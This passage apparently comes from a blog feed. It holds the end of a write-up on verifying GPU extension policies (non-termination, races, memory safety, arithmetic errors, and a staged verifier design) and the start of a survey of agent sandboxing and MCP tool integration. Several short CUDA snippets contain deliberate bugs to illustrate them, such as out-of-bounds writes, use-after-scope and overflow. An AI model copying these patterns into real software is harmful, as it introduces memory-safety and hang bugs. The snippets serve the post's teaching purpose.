Protocol verification (WEFT-style): for specific synchronization patterns, prove deadlock freedom + race freedom + safe reuse. Model barrier instances across loop iterations and prove safe reuse.(zhangyuqun.github.io)
Symbolic exploration (GKLEE-style): explore possible interleavings and detect deadlock states.(Lingming Zhang)

Verification strategy

Ban blocking primitives in policy code (locks, spin loops, waiting on global conditions). Add a verifier rule: no unbounded loops / no "wait until" patterns. If you absolutely need synchronization, force "single-lane, nonblocking" patterns and bounded retries. Policies must not interact with named barriers (no waits, no signals). This aligns with the availability story: policies must not create device stalls.

Verification scope analysis

Scope & Assurance: Extension-local (E), By-construction. Deadlock patterns (spin-wait, lock contention, named-barrier misuse) are structural properties of policy code; banning blocking primitives makes deadlocks structurally impossible with perfect soundness and high completeness (blocking patterns are rarely needed in policy code).

Production guarantee: The verifier bans: (1) while(condition) loops that could spin indefinitely; (2) lock primitives and mutex-like patterns; (3) named-barrier operations (waits, signals); (4) waiting on global conditions; (5) any construct that could block warp/block execution. If synchronization is needed, force "single-lane, nonblocking" patterns with bounded retries.

Offline/CI tools: ESBMC-GPU models and checks deadlock via bounded model checking; WEFT verifies deadlock freedom, safe barrier recycling, and race freedom for producer-consumer synchronization with named barriers; GKLEE reports finding deadlocks via symbolic exploration. iGUARD notes that lockstep execution can deadlock if threads within a warp use distinct locks.

Residual gap: Policies with legitimate bounded-retry patterns must be structured with explicit iteration counts to prove termination. iGUARD notes that lockstep execution can deadlock when threads within a warp use distinct locks, and ITS in turn removes the warp-lockstep guarantees that older synchronization idioms relied on. Banning blocking primitives is the only sound approach without complex ITS-aware analysis.
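
A nonblocking, bounded-retry update might look like the following host-side sketch. It uses `std::atomic` as a stand-in for a device-side compare-and-swap, and `bounded_atomic_max` is a hypothetical helper name. The point is only that the retry count is an explicit bound, so termination is evident from the loop header.

```cpp
#include <atomic>
#include <cassert>

// Tries to raise `slot` to at least `value` using at most `max_retries`
// compare-and-swap attempts. Returns true if slot >= value was observed or
// established, false if the retry budget ran out first. Never blocks.
bool bounded_atomic_max(std::atomic<int>& slot, int value, int max_retries) {
    assert(max_retries >= 0);
    int seen = slot.load(std::memory_order_relaxed);
    for (int attempt = 0; attempt < max_retries; ++attempt) {
        if (seen >= value) return true;  // nothing left to do
        // On failure, compare_exchange_strong reloads `seen` with the
        // value currently stored in `slot`.
        if (slot.compare_exchange_strong(seen, value,
                                         std::memory_order_relaxed))
            return true;
    }
    return seen >= value;  // caller takes a fallback path on false
}
```

When the helper returns false the caller has to degrade gracefully, for example by dropping the update, rather than waiting for another thread to make progress.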

16) Kernel Non-Termination / Infinite Loops [Safety, GPU-amplified]

What it is / why it matters

Infinite loops can hang GPU execution. In practice, non-termination is especially dangerous because GPU preemption/recovery can be coarse.

Bug example

__global__ void k(int* flag) {
  while (*flag == 0) { }  // infinite loop if flag never set
  // or: while (true) { /* missing break */ }
}

Seen in / checked by

CL-Vis explicitly calls out infinite loops (together with barrier divergence) as GPU-specific bug types to detect/handle.(Computing and Informatics)

Checking approach

Static bounds analysis: prove loop termination or enforce compile-time bounded loops.
Runtime watchdog: timeout-based detection (coarse but practical).

Verification strategy

This is where "bounded overhead = correctness" is easiest to justify: enforce a strict instruction/iteration bound for policy code (like eBPF on CPU). If policies may contain loops, require compile-time bounded loops only, with conservative upper bounds.

Verification scope analysis

Scope & Assurance: Extension-local (E) for policy; kernel non-termination is out of scope. Static-sound, where bounded loops or instruction budget guarantees policy termination with strong soundness but low completeness (data-dependent loop bounds rejected even if always terminating).

Production guarantee: The eBPF approach works: (1) all loops must have compile-time bounded iteration counts; OR (2) ban loops entirely; OR (3) enforce a total instruction budget. The verifier proves termination by construction without analyzing the kernel. Policies may contain loops only if bounds can be statically determined.

Offline/CI tools: ESBMC-GPU can find non-termination paths within context bounds; CL-Vis explicitly calls out infinite loops (together with barrier divergence) as GPU-specific bug types to detect; runtime watchdogs provide coarse timeout-based detection (engineering stopgap, not completeness).

Residual gap: The verifier guarantees policy termination, not kernel termination. If the kernel itself has infinite loops, the policy verifier cannot and should not try to detect this; that's a kernel bug requiring kernel-level tools. This is "bounded overhead = correctness" at its most justified.
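
As a minimal sketch of the budget check, assume the verifier has already summarized each loop as a static trip-count bound plus a worst-case body cost. The `LoopSummary` type and `fits_instruction_budget` function are hypothetical, and loops are treated as sequential rather than nested to keep the example short.

```cpp
#include <cassert>
#include <cstdint>
#include <vector>

// Hypothetical summary of one loop as a verifier might record it.
struct LoopSummary {
    bool has_static_bound;    // false if the trip count depends on runtime data
    std::uint64_t max_trips;  // only meaningful when has_static_bound is true
    std::uint64_t body_cost;  // worst-case instructions per iteration
};

// Accepts a policy only if every loop has a compile-time bound and the
// worst-case instruction count fits in the budget.
bool fits_instruction_budget(std::uint64_t straight_line_cost,
                             const std::vector<LoopSummary>& loops,
                             std::uint64_t budget) {
    if (straight_line_cost > budget) return false;
    std::uint64_t total = straight_line_cost;
    for (const LoopSummary& loop : loops) {
        if (!loop.has_static_bound) return false;  // e.g. while (*flag == 0) { }
        // Reject early so the multiplication below cannot overflow.
        if (loop.body_cost != 0 &&
            loop.max_trips > (budget - total) / loop.body_cost)
            return false;
        total += loop.max_trips * loop.body_cost;
    }
    return true;
}
```

A data-dependent loop is rejected even if it would always terminate in practice, which is the low-completeness trade-off described above.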

17) Global-Memory Data Races [Correctness, CPU-shared]

What it is / why it matters

Races on global memory are a fundamental correctness issue. Unlike shared memory (block-local), global memory is accessible by all threads across all blocks, making races harder to reason about. Many GPU race detectors historically focused on shared memory and ignored global-memory races.

Bug example

__global__ void k(int* g, int n) {
  int tid = blockIdx.x * blockDim.x + threadIdx.x;
  // Multiple threads may write to same location without sync
  if (tid < n) g[tid % 16] += 1;  // race if multiple threads hit same index
}

Seen in / checked by

ScoRD explicitly argues that many GPU race detectors focus on shared memory and ignore global-memory races.(CSA - IISc Bangalore)
iGUARD targets races in global memory introduced by advanced CUDA features.(Aditya K Kamath)
GKLEE reports global memory races via symbolic exploration.(Lingming Zhang)

Checking approach

Static verification: extend race-freedom proofs to global memory accesses.
Dynamic detection: instrument global memory accesses and track conflicting pairs.

Verification strategy

If policies can write to global memory (maps, counters, logs), require either: (1) warp-uniform single-writer rules, (2) atomic-only helpers, or (3) per-thread/per-warp sharding. Ban unprotected global writes from policies.

Verification scope analysis

Scope & Assurance: Combined → Extension-local (C→E) via state isolation, Static-sound. If policies can write arbitrary kernel global memory, race analysis requires knowing the kernel's access patterns (Combined). Restricting policies to write only policy-owned objects reduces this to Extension-local. Isolation then gives strong soundness, at the cost of low completeness for kernel-modifying policies (direct kernel writes still require Combined analysis).

Production guarantee: Restricting policies to write only policy-owned objects (maps, ringbuffers) enables Extension-local verification: (1) policy-owned objects use known-safe access patterns (atomics, per-warp sharding); (2) the verifier guarantees race-freedom for policy state without inspecting the kernel; (3) ban unprotected global writes from policies. Three safe patterns: warp-uniform single-writer rules, atomic-only helpers, or per-thread/per-warp sharding.

Offline/CI tools: ScoRD explicitly argues that many GPU race detectors focus on shared memory and ignore global-memory races, and provides detection with scope awareness; iGUARD targets races in global memory introduced by advanced CUDA features via NVBit instrumentation; GKLEE reports global memory races via symbolic exploration. Note: Compute Sanitizer racecheck is primarily a shared-memory hazard detector; do not expect it to fully cover global races.

Residual gap: Policies needing to modify kernel data structures directly cannot be verified locally; this capability should be restricted or require explicit kernel-side contracts. ScoRD/iGUARD emphasize global-memory races are underdetected by existing tools; state isolation sidesteps this entirely for policy code.

18) Memory Safety (Out-of-Bounds / Misaligned / Use-After-Free / Use-After-Scope / Uninitialized) [Safety, CPU-shared]

What it is / why it matters

Classic memory safety includes both spatial (OOB, misaligned) and temporal (UAF, UAS) violations. Temporal bugs exist on GPUs too: pointers can outlive allocations (host frees while kernel still uses, device-side stack frame returns, etc.).

Bug example (OOB)

__global__ void k(float* a, int n) {
  int tid = blockIdx.x * blockDim.x + threadIdx.x;
  a[tid + 1024] = 0.0f;   // OOB write whenever tid + 1024 >= n: the index is never checked against n
}

Bug example (Use-After-Scope)

__device__ int* bad() {
  int local[8];
  return local;          // returns pointer to dead stack frame (UAS)
}
__global__ void k() {
  int* p = bad();
  int x = p[0];          // UAS read
}

Seen in / checked by

Compute Sanitizer memcheck precisely detects OOB/misaligned accesses (and can detect memory leaks).(NVIDIA Docs)
Oclgrind reports invalid memory accesses in its simulator.(GitHub)
ESBMC-GPU checks pointer safety and array bounds as part of its model checking.(GitHub)
GKLEE's evaluation includes out-of-bounds global memory accesses as error cases.(Lingming Zhang)
Wu et al.: "unauthorized memory access" appears in root-cause characterization.(arXiv)
cuCatch explicitly targets temporal violations using tagging mechanisms and discusses UAF/UAS detection.(d1qx31qr3h6wln.cloudfront.net)
Guardian: PTX-level instrumentation + interception to fence illegal memory accesses under GPU sharing.(arXiv)

Checking approach

Bounds-check instrumentation (Guardian/cuCatch-style): insert base+bounds checks (or partition fencing) around loads/stores, for example via PTX-level instrumentation and interception.(arXiv)
Temporal tagging + runtime checks (cuCatch-style): tag allocations, track allocation ownership, and validate the tag before each dereference.(d1qx31qr3h6wln.cloudfront.net)
Static verification (ESBMC-GPU): model checking for pointer safety and array bounds.(GitHub)

Verification strategy

This is the "classic verifier" portion: keep eBPF-like pointer tracking, bounds checks, and restricted helpers. Easiest for policies is to ban arbitrary pointer dereferences and force all memory access through safe helpers (maps/ringbuffers). Ideally: policies cannot allocate/free; all policy-visible objects are managed by the extension runtime and remain valid across policy execution (no UAF/UAS by construction). Also add a testing story: run policy-enabled kernels under Compute Sanitizer memcheck in CI for regression.

Verification scope analysis

Scope & Assurance: Extension-local (E) for policy memory. Static-sound for spatial safety (helper-only access with tracked bounds); By-construction for temporal safety (runtime-managed objects, no policy malloc/free). Strong soundness with low completeness (raw pointer arithmetic rejected).

Production guarantee: The eBPF approach: (1) ban arbitrary pointer dereferencing; (2) all memory access through verified helpers (map lookup, ringbuffer write); (3) verifier tracks pointer provenance and bounds; (4) policy-visible objects are runtime-managed (no policy malloc/free): UAF/UAS impossible by construction because objects remain valid for the policy's lifetime. This provides strong memory safety for policy code without analyzing the kernel.

Offline/CI tools: Compute Sanitizer memcheck precisely detects OOB/misaligned accesses and memory leaks; cuCatch explicitly targets temporal violations using tagged base&bounds mechanisms and discusses UAF/UAS detection (some deterministic, some probabilistic); ESBMC-GPU checks pointer safety and array bounds via bounded model checking; GKLEE's evaluation includes out-of-bounds global memory accesses as error cases; Wu et al. characterize "unauthorized memory access" in their root-cause analysis; Guardian provides PTX-level instrumentation + interception for multi-tenant memory isolation.

Residual gap: Policy memory safety doesn't protect against kernel bugs. For multi-tenant fault isolation in spatial sharing (streams/MPS), Guardian-style PTX instrumentation or hardware isolation is needed to prevent one tenant's OOB from crashing others: policy verification alone is insufficient for system-wide isolation.

Multi-tenant implications

In spatial sharing (streams/MPS), kernels share a GPU address space. An OOB access by one application can crash other co-running applications (fault isolation issue). Guardian's motivation explicitly calls out this problem and designs PTX-level fencing + interception as a fix.(arXiv) This directly supports the "availability is correctness" story: if policies run in privileged/shared contexts, you must prevent policy code from generating OOB accesses. Either: (a) only allow map helpers (no raw memory), or (b) instrument policy memory ops with bounds checks (Guardian-style PTX rewriting).

Bug example (multi-tenant OOB, conceptual)

// Tenant A kernel writes OOB and corrupts Tenant B memory in same context.

Bug example (Uninitialized Memory)

__global__ void k(float* out, float* in, int n) {
  int tid = blockIdx.x * blockDim.x + threadIdx.x;
  if (tid >= n) return;       // bounds guard, so the only bug shown is the uninitialized read
  // 'in' was cudaMalloc'd but never initialized or memset
  out[tid] = in[tid] * 2.0f;  // reading uninitialized memory
}

Uninitialized Memory: additional notes

Accessing device global memory without initialization leads to nondeterministic behavior. This is a frequent source of heisenbugs because GPU concurrency amplifies nondeterminism. Compute Sanitizer initcheck reports cases where device global memory is accessed without being initialized.(NVIDIA Docs) For policies, require explicit initialization semantics (e.g., map lookup returns "not found" unless initialized; forbid reading uninitialized slots).
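One way to picture the "explicit initialization semantics" suggested above is a map whose slots read as "not found" until they have been written. The sketch below is a host-side model in Python under that assumption; the class name `PolicyMap` and its methods are hypothetical, not part of any existing runtime.

```python
class PolicyMap:
    """Fixed-capacity map whose slots read as 'not found' until written."""

    def __init__(self, capacity):
        self._values = [0] * capacity
        self._written = [False] * capacity

    def update(self, slot, value):
        """Write a slot; out-of-range writes are refused rather than performed."""
        if not 0 <= slot < len(self._values):
            return False
        self._values[slot] = value
        self._written[slot] = True
        return True

    def lookup(self, slot):
        """Return the value, or None for out-of-range or never-written slots."""
        if 0 <= slot < len(self._values) and self._written[slot]:
            return self._values[slot]
        return None

m = PolicyMap(4)
print(m.lookup(2))   # slot never written
m.update(2, 7)
print(m.lookup(2))
```

The policy can never observe stale or garbage contents, because every read path goes through the written-flag check.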

19) Arithmetic Errors (overflow, division by zero) [Correctness/Safety, CPU-shared]

What it is / why it matters

Arithmetic errors can corrupt keys/indices and cascade into memory safety/perf disasters.

Bug example

__global__ void k(int* out, int* in, int divisor) {
  int tid = blockIdx.x * blockDim.x + threadIdx.x;
  out[tid] = in[tid] / divisor;  // div-by-zero if divisor == 0

  int idx = tid * 1000000;       // overflow for large tid
  out[idx] = 1;                  // corrupted index => OOB
}

Seen in / checked by

ESBMC-GPU explicitly lists arithmetic overflow and division-by-zero among the properties it checks for CUDA programs (alongside races/deadlocks/bounds).(GitHub)

Checking approach

Model checking (ESBMC-GPU): static verification of arithmetic properties.
Lightweight runtime checks: guard div/mod operations.

Verification strategy

Optional but reviewer-friendly: add lightweight verifier checks for div-by-zero and dangerous shifts, and constrain pointer arithmetic (already typical in eBPF verifiers). For "perf correctness," overflow in index computations is a common hidden cause of random/uncoalesced patterns.

Verification scope analysis

Scope & Assurance: Extension-local (E), Static-sound. Arithmetic errors depend only on the policy's operations and input value ranges, providing strong soundness via range analysis with medium completeness (complex arithmetic may require explicit assertions).

Production guarantee: The verifier performs lightweight static checks: (1) division: require static proof that divisor ≠ 0, or insert runtime guards; (2) overflow: use saturating arithmetic, or prove bounds on operands; (3) dangerous shifts: validate shift amounts; (4) index arithmetic: track value ranges to catch OOB before memory access. This is already typical in eBPF verifiers and adds minimal overhead to policy verification.
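The range-tracking idea behind checks (1), (2), and (4) can be sketched with plain interval arithmetic. This is a minimal model, assuming 32-bit signed policy integers; the `Range` type and helper names are illustrative only.

```python
from dataclasses import dataclass

INT32_MIN, INT32_MAX = -2**31, 2**31 - 1

@dataclass(frozen=True)
class Range:
    lo: int
    hi: int

def mul(a, b):
    """Interval product: the extremes are always among the four corner products."""
    corners = [a.lo * b.lo, a.lo * b.hi, a.hi * b.lo, a.hi * b.hi]
    return Range(min(corners), max(corners))

def fits_int32(r):
    return INT32_MIN <= r.lo and r.hi <= INT32_MAX

def may_be_zero(r):
    """True if the divisor range contains 0, so a runtime guard is required."""
    return r.lo <= 0 <= r.hi

def index_in_bounds(r, length):
    return 0 <= r.lo and r.hi < length

# The bug example above: idx = tid * 1000000 with up to 2**20 threads.
tid = Range(0, 2**20 - 1)
idx = mul(tid, Range(1_000_000, 1_000_000))
print(fits_int32(idx))               # the product can exceed INT32_MAX
print(may_be_zero(Range(-1, 5)))     # divisor not provably non-zero
```

A verifier built this way rejects (or guards) the multiplication before the corrupted index ever reaches a memory access.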

Offline/CI tools: ESBMC-GPU explicitly lists arithmetic overflow and division-by-zero among the properties it checks for CUDA programs (alongside races/deadlocks/bounds) via bounded model checking.

Residual gap: Policies with complex arithmetic that happens to be safe may need explicit assertions or be conservatively rejected. Cascade risk: arithmetic errors often cascade into memory safety bugs (corrupted indices → OOB) or performance bugs (overflow in index computations causing random/uncoalesced patterns). The verifier should track value ranges through index computations proactively to catch these before they become downstream violations.

Summary: Improper Synchronization as a Root-Cause Category (Wu et al.'s Three-Way Taxonomy)

Wu et al.'s empirical study explicitly groups CUDA-specific synchronization issues into three concrete bug types: data race, barrier divergence, and redundant barrier functions. They also highlight that these often manifest as inferior performance and flaky tests. Simulee is used to find these categories in real projects.(arXiv)

This is exactly the "verification story" hook: a GPU extension verifier can claim that policy code cannot introduce these synchronization root causes because:

barriers are only allowed at provably uniform control-flow points,
side effects must be warp-uniform,
helper calls are bounded,
and policies use a restricted memory model.
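The first rule in the list above can be sketched as a taint-style pass: any value derived from a thread or lane index is treated as divergent, and a barrier nested under a branch on a divergent value is rejected. The tiny statement format below is an assumption made for this example (no loops, conditions are single variables), and the analysis is deliberately conservative: once a variable is marked divergent it stays divergent.

```python
DIVERGENT_SOURCES = {"threadIdx.x", "laneid"}

def find_divergent_barriers(stmts, divergent=None, in_divergent_branch=False, path=()):
    """Return the positions of barriers that sit under possibly divergent control flow."""
    divergent = set(DIVERGENT_SOURCES) if divergent is None else divergent
    bad = []
    for i, stmt in enumerate(stmts):
        kind, here = stmt[0], path + (i,)
        if kind == "assign":
            _, dst, srcs = stmt
            # Data dependence on a divergent value, or assignment under divergent control.
            if in_divergent_branch or any(s in divergent for s in srcs):
                divergent.add(dst)
        elif kind == "if":
            _, cond, body = stmt
            nested = in_divergent_branch or cond in divergent
            bad += find_divergent_barriers(body, divergent, nested, here)
        elif kind == "barrier" and in_divergent_branch:
            bad.append(here)
    return bad

uniform_policy = [("assign", "n", ["blockDim.x"]), ("if", "n", [("barrier",)])]
divergent_policy = [("assign", "t", ["threadIdx.x"]), ("if", "t", [("barrier",)]), ("barrier",)]

print(find_divergent_barriers(uniform_policy))
print(find_divergent_barriers(divergent_policy))
```

Over-approximating divergence means some safe policies are rejected, which matches the "strong soundness, lower completeness" trade-off described for the static-sound classes.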

Summary: Verification Scope and Assurance Types

The verification scope and assurance type dimensions reveal crucial insights for GPU extension framework design.

By Verification Scope

Extension-local (E): 16 of 19 classes:
Bugs #1, #2, #4, #6, #7, #10, #11, #12, #15, #16, #18, #19 (12 classes) can be eliminated purely by restricting policy code, without inspecting the host kernel. Additionally, bugs #3, #5, #14, #17 (4 classes) can be reduced from Combined to Extension-local through state isolation.

Combined (C): 2 classes requiring contracts:
Bugs #8 (block-size dependence) and #9 (launch config assumptions) fundamentally depend on kernel launch parameters. These require contract-based validation at attach time.

Host+Device (H): 1 class requiring host-side tools:
Bug #13 (host↔device async races) cannot be addressed by device-side verification. Requires CuSan/TSan and careful API design.

By Assurance Type

Assurance Type	Bug Classes	Soundness	Completeness
By-construction	#2, #10, #15	Perfect	High
Static-sound	#1, #3, #4, #5, #6, #11, #14, #16, #17, #18, #19	Strong	Low-Medium
Static-heuristic	#7, #12	Good	Medium
Contract-based	#8, #9	Conditional	Depends on contracts
Dynamic-only	#13	Executed paths only	Coverage-dependent
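As a quick sanity check on the table above, the following snippet transcribes its rows and confirms that the five assurance types partition all 19 bug classes, with each class appearing exactly once.

```python
# Rows transcribed from the "By Assurance Type" table.
ASSURANCE = {
    "By-construction": [2, 10, 15],
    "Static-sound": [1, 3, 4, 5, 6, 11, 14, 16, 17, 18, 19],
    "Static-heuristic": [7, 12],
    "Contract-based": [8, 9],
    "Dynamic-only": [13],
}

counts = {name: len(bugs) for name, bugs in ASSURANCE.items()}
all_bugs = sorted(b for bugs in ASSURANCE.values() for b in bugs)

print(counts)
print(all_bugs == list(range(1, 20)))  # every class covered exactly once
```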

The Three-Stage Verification Pipeline

Stage 1: Load-time static verifier (core, analogous to eBPF verifier)

The load-time verifier employs three tiers of analysis, ranging from outright bans on genuinely dangerous constructs to static analysis that preserves useful functionality:

Tier A — By-construction bans (3 classes, no legitimate policy use):

Ban warp sync primitives (#2) — mask correctness is unverifiable without ITS-aware analysis
Ban spin-wait / polling loops (#10) — causes stale reads and ad-hoc synchronization
Ban blocking primitives: locks, mutexes, named barriers (#15) — prevents non-barrier deadlocks

Tier B — Static-sound analysis (11 classes, allow but verify safe usage):

Verification capability	Bug classes covered	What it does
Uniform control-flow analysis	#1 barrier divergence, #4 warp-divergence race, #6 control-flow divergence	Prove barriers are at uniform points; side-effects on uniform paths
Memory access pattern analysis	#5 uncoalesced access, #7 bank conflicts	Check stride patterns; reject non-conforming index expressions
Race-freedom structural rules	#11 shared-mem races, #17 global-mem races	Per-lane sharding / lane0-only / atomic helpers + state isolation
Scope enforcement	#3 atomic scope	Force device-scope for policy atomics + state isolation
Pointer/memory safety	#18 memory safety	Restrict pointer operations, analogous to eBPF pointer verification
Loop termination	#16 non-termination	Enforce bounded iteration counts
Range analysis	#19 arithmetic errors	Track value ranges to prevent overflow cascading into OOB
Resource budgets	#14 atomic contention	Limit atomic counts / enforce warp-aggregation

Tier C — Static-heuristic detection (2 classes, performance warnings/rejections):

#7 bank conflicts → check shared-memory index stride against bank mapping
#12 redundant barriers → dependence analysis to determine if a barrier protects actual cross-thread dependencies
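For the bank-conflict heuristic in Tier C, a minimal model is to enumerate which bank each lane hits for an index of the form lane * stride. The sketch assumes 32 banks of 4-byte words and a 32-lane warp, and treats lanes that read the same word as a broadcast rather than a conflict; the function name is illustrative.

```python
NUM_BANKS = 32   # assumption: 32 banks, one 4-byte word wide
WARP_SIZE = 32

def conflict_degree(stride_words):
    """Worst-case number of distinct words mapped to one bank for index = lane * stride."""
    banks = {}
    for lane in range(WARP_SIZE):
        word = lane * stride_words
        banks.setdefault(word % NUM_BANKS, set()).add(word)
    # Lanes reading the same word are served together, so count distinct words per bank.
    return max(len(words) for words in banks.values())

for stride in (1, 2, 32, 33):
    print(stride, conflict_degree(stride))
```

A verifier could warn or reject when the degree for a statically known stride exceeds a configured threshold; odd strides such as 33 are the usual padding fix.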

Stage 2: Attach-time contract validation (2 classes)

#8 block-size dependence → policy declares preconditions (e.g., requires: blockDim.x >= 128), validated when attaching to a specific kernel
#9 launch config assumptions → validate grid/block dimensions satisfy policy preconditions
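Attach-time validation of such preconditions can be sketched as follows. The `field op integer` clause syntax mirrors the `requires: blockDim.x >= 128` example above, but the parser, the supported operators, and the launch-configuration dictionary are assumptions made for illustration.

```python
import operator

OPS = {">=": operator.ge, "<=": operator.le, "==": operator.eq}

def parse_requires(clause):
    """Parse a hypothetical 'field op int' precondition such as 'blockDim.x >= 128'."""
    field, op, value = clause.split()
    return field, OPS[op], int(value)

def validate_attach(requires, launch_config):
    """Return the clauses that the launch configuration violates (empty = attach allowed)."""
    failed = []
    for clause in requires:
        field, op, value = parse_requires(clause)
        # A field missing from the launch configuration counts as a violation.
        if field not in launch_config or not op(launch_config[field], value):
            failed.append(clause)
    return failed

policy_requires = ["blockDim.x >= 128", "gridDim.x <= 1024"]
print(validate_attach(policy_requires, {"blockDim.x": 256, "gridDim.x": 64}))
print(validate_attach(policy_requires, {"blockDim.x": 64, "gridDim.x": 64}))
```

Rejecting at attach time keeps the guarantee conditional on the contract, which is exactly the "Contract-based" assurance level in the table.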

Stage 3: CI/Offline + Runtime (complementary coverage)

#13 host↔device async races → CuSan/TSan dynamic detection, beyond device-side verification scope
GPUVerify/ESBMC-GPU for kernel+extension combined analysis (when source is available)
Compute Sanitizer suite for dynamic regression testing
iGUARD/Simulee for advanced race detection
Runtime overhead enforcement for multi-tenant isolation (Guardian-style)

The eBPF Lesson Applied to GPUs

Just as eBPF succeeds by restricting extension capabilities to what can be verified without inspecting the kernel, a GPU extension verifier should:

Ban only what is genuinely dangerous and unnecessary — warp sync, spin-wait, and blocking primitives have no legitimate use in policy code
Use static analysis to allow useful features safely — barriers, shared memory, and atomics are valuable; verify their safe usage rather than banning them
Isolate policy state to reduce Combined bugs to Extension-local
Enforce warp-uniformity for side effects, bounding SIMT-amplified overhead
Use budgets for performance-affecting resources (atomics, memory ops)
Require contracts only for unavoidably Combined properties (#8, #9)

The key design principle is not to ban everything that could go wrong, but to apply the right level of restriction for each risk: outright bans for constructs with no legitimate policy use, static verification for useful but dangerous features, and heuristic detection for performance concerns. This preserves policy expressiveness while maintaining soundness for safety-critical GPU extensions.

Architectures for Agent Systems: A Survey of Isolation, Integration, and Governance

云微 — Tue, 03 Feb 2026 07:36:18 +0000

Large Language Model (LLM) based agent systems – software that leverages LLMs to autonomously plan and execute multi-step tasks using external tools – are rapidly moving from proof-of-concept demos into enterprise deployment. These agents promise to automate coding, IT operations, data analysis, and more, but deploying them in production raises new challenges in security, reliability, and integration. Over the last half-year, the community has converged on key strategies: strong isolation for executing untrusted actions, standardized protocols for tool integration, and governance frameworks to align agent behavior with enterprise policies. This survey provides a systematic review of recent developments (roughly the latter half of 2025), including agent sandbox architectures, emerging standards like MCP, open-source projects, industry initiatives, and research advances. We focus on the pain points encountered when bringing agent systems to production and how the latest solutions address (or still fall short on) those needs.

1. Agent System Architecture in the Enterprise

An enterprise-ready agent system typically consists of several layers: (i) an LLM-based reasoning core (the "agent" that decides which actions to take), (ii) an interface to invoke external tools or services (e.g. via APIs, command-line, databases), and (iii) an execution environment or runtime where the agent's tool actions (like running code or shell commands) actually occur. Surrounding these are components for memory/state storage, orchestration (especially if multiple agents work together), and monitoring & control (for safety and compliance). The overarching architectural challenge is that these systems are highly dynamic and open-ended: the agent may generate arbitrary code or tool requests at runtime, often based on unpredictable input. This requires a different approach to software architecture than traditional deterministic services.

Isolation and Safety by Design. Unlike a bounded microservice, an AI agent might decide to execute unvetted code or make system-altering calls. A core architectural principle emerging in 2025 is to sandbox the agent's actions: run them in an isolated environment that protects the host system and network. For example, the open-source Agent Sandbox for Kubernetes was introduced as a new Kubernetes primitive to run AI agents safely. Instead of letting LLM-generated code run in a standard container (which could still abuse the host kernel or other pods), Agent Sandbox relies on stronger isolation runtimes (gVisor's user-space kernel, with optional Kata Containers lightweight VMs) to create a secure barrier between the agent's code and the cluster node's OS. This keeps potentially malicious or errant code from interfering with other applications or the host. The sandbox is managed via a custom Kubernetes resource (CRD) called Sandbox, which represents a single, stateful, long-lived pod with a stable identity and persistent storage. This design reflects a shift from treating agent workloads as ephemeral stateless functions to treating them as session-oriented services that may hold state over time. Indeed, the Agent Sandbox supports features like pausing and resuming the sandbox, automatically reviving it if a network reconnect is needed, and even memory sharing across sandboxes for efficiency. It also provides a templating and pool mechanism (SandboxTemplate and SandboxClaim) to manage pools of pre-warmed sandbox pods. Pre-warming is crucial because launching a fresh isolated environment can be slow; by keeping a pool of ready-to-go sandboxes, startup latency for a new agent session is dramatically reduced (Google reports sub-second startup latency, a ~90% improvement over cold-starting sandboxes). In Google's GKE, this is paired with a new Pod Snapshots feature that can checkpoint and restore running sandbox pods (even GPU workloads), cutting startup from minutes to seconds and avoiding idle resource waste. In short, the sandbox architecture is purpose-built for autonomous agents: it provides stronger isolation than ordinary containers, yet supports persistent state and fast elasticity to accommodate long-running, interactive agent tasks at scale.
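The pre-warming idea can be illustrated with a small in-memory model: a pool keeps a fixed number of already-booted sandboxes, a claim takes one from the pool if available, and only an exhausted pool pays the cold-start cost. This is a conceptual sketch, not the Agent Sandbox API; the `WarmPool` class and the `sandbox-N` identifiers are hypothetical.

```python
from collections import deque
from itertools import count

class WarmPool:
    """Toy model of a pre-warmed sandbox pool (not the Kubernetes controller)."""

    def __init__(self, size):
        self._ids = count(1)
        self.size = size
        self.cold_starts = 0
        self.ready = deque(self._boot() for _ in range(size))

    def _boot(self):
        # Stands in for a slow isolated-environment start.
        return f"sandbox-{next(self._ids)}"

    def claim(self):
        if self.ready:
            return self.ready.popleft()   # fast path: already booted
        self.cold_starts += 1
        return self._boot()               # slow path: pool exhausted

    def replenish(self):
        while len(self.ready) < self.size:
            self.ready.append(self._boot())

pool = WarmPool(2)
claimed = [pool.claim() for _ in range(3)]
print(claimed, pool.cold_starts)
```

In a real deployment the replenish step would run in the background so that the fast path is the common case.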

Stateful Singleton Runtimes. Traditional cloud apps often scale by running many stateless instances behind a load balancer, but agent use-cases (like an AI coding assistant or an autonomous scheduler) often manifest as a single specialized "worker" with memory (such as cached tools or context) that persists across many tool calls. The Kubernetes Agent Sandbox explicitly targets these singleton, stateful workloads – not just for AI agents but also things like CI/CD build agents or single-node databases that require stable identity and disk state. This reflects a broader industry recognition: agent applications need new runtime primitives that can maintain continuity of state and identity across a session (for example, so the agent can incrementally build on previous tool outputs, or maintain an authenticated session to a service). Recent designs propose durable execution for agents – the ability to pause an agent's process, snapshot its memory or file system, and later resume or even migrate it. The GKE Agent Sandbox + Pod Snapshot combo is an early real-world example of this, effectively treating an agent's environment as a checkpointable virtual machine. We anticipate emerging orchestration support where an agent can be hibernated when idle and quickly reawakened when needed, balancing responsiveness with efficient resource use.

Tool Interface Layer. The other critical piece of architecture is how agents interface with external tools and data. Historically, each AI assistant platform invented its own plugin system or API schema (e.g. OpenAI's Plugins, LangChain's tool abstractions). This led to a fragmented ecosystem where tools had to be rewritten for each agent framework. Over 2025, a consensus has grown around Model Context Protocol (MCP) as a standard interface between AI models (the clients) and tools or services (the servers). MCP was released by Anthropic in late 2024 and by 2025 it has become "the universal standard protocol for connecting AI models to tools, data, and applications". Conceptually, MCP defines a simple JSON-RPC-based client-server protocol by which an AI agent can discover available tools and invoke them with arguments, and receive results/observations. The tools can be anything: database queries, file system operations, web requests, code compilation – each exposed by an MCP server that the agent connects to. The power of a common protocol is that it transforms the integration problem from M×N (every model integrating with every tool) to M+N modularity. A tool developer can create an MCP server once, and any compliant agent (whether it's OpenAI's, Anthropic's, or an open-source project) can use it. This dramatically reduces duplicated effort and makes the system more maintainable. GitHub engineers describe MCP as creating a "USB-C for AI" – a universal port for tools. In practice, MCP connections can be local (via stdio pipes) or remote (HTTP+SSE streams), and are typically stateful sessions, which aligns well with the idea of agent tools that maintain context (e.g. a database connection that stays open, or a browser that retains cookies).
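To make the protocol shape concrete, the sketch below builds the two JSON-RPC 2.0 requests an MCP client typically sends to discover and invoke tools (`tools/list` and `tools/call`), and works through the M×N versus M+N arithmetic. The tool name `query_db` and its arguments are hypothetical, and the initialization handshake and transport are omitted.

```python
import json
from itertools import count

_ids = count(1)

def jsonrpc_request(method, params=None):
    """Build a JSON-RPC 2.0 request object with a fresh id."""
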